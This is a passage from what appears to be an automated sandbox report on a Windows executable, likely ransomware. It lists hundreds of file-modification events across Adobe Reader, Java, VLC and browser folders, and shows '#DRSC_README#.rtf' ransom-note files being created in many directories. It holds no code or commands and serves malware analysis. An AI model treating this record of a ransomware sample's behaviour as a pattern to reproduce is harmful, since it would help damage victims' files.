DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ar-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Mail\wabmig.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyoptionaltools.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\LICENSE 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\et_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\exportpdf-selector.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\jquery.ui.touch-punch.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_radio_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\faf-main.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-default_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\dd_arrow_small.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\file_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\meta-index 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\AddressBook.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActionExceptionHandlers.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyLocale_hu.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pt-br\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\ffjcext.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\GroupPing.m1v 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_folder-focus_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\exportpdfupsell-app-tool-view.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Bus Schedule.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaTypewriterRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\fr-ma\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\weblink.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text-2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\print_poster.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\default.jfc 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbUpOutline_22_N.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\mr.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\Install\{33958840-4836-4D50-B0D4-7D5C5BA25734}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-cn_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jcmd.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\cstm_brand_preview.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ReceiveMeasure.mp2v 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 